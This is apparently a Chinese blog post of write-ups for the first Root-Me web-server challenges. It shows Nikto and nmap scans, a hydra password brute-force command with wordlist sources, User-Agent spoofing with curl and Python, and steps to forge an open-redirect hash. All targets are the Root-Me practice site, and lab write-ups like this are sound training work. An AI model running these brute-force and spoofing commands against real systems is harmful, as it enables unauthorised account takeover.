web-server前四题

发表于 分类于 阅读次数: Valine:
本文字数: 1.5k 阅读时长 ≈ 1 分钟

Weak password

tNikto

Nikto是一款开源的(GPL)网页服务器扫描器,它可以对网页服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件/CGIs;超过625种服务器版本;超过230种特定服务器问题。

nikto -host http://challenge01.root-me.org/web-serveur/ch3/

nmap

nmap -d -vv -p 80 --script http-brute --script-args http-brute.path=/web-serveur/ch3/ challenge01.root-me.org

-d: Increase debugging level
-v: Increase verbosity level (use -vv or more for greater effect)
--script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories
--script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts

hydra

hydra -L userList.txt -P passwordsList.txt 212.129.38.224 http-head /web-serveur/ch3/ 

- users list inspired by http://blog.infowebmaster.fr/public/resource/wordpress-brute-force-login-a-eviter.txt
- passwords list downloaded from http://blog.teckn0.com/wp-content/uploads/brute_force/Liste_mot_%20anglais.7z

user-agent

curl -L -A "admin" challenge01.root-me.org/web-serveur/ch2
-A, –user-agent Send User-Agent to server
-L, –location Follow redirects

python

1
2
3
import requests
resp = requests.get('http://challenge01.root-me.org/web-serveur/ch2/', headers={'User-Agent': 'Admin'}) 
print resp.text

HTTP open redirt

hash-identifier

1
2
3
4
1. Select a domain to hash not listed in the page, like: https://google.com
2. Hash the string domain here or another: http://www.fileformat.info/tool/hash.htm
3. Construct the url like this and press enter: http://challenge01.root-me.org/web-serveur/ch52/?url=##DOMAIN##&h=##HASH##
4. When new page is loading, you can see the flag, stop the redirection pressing escape and copy it.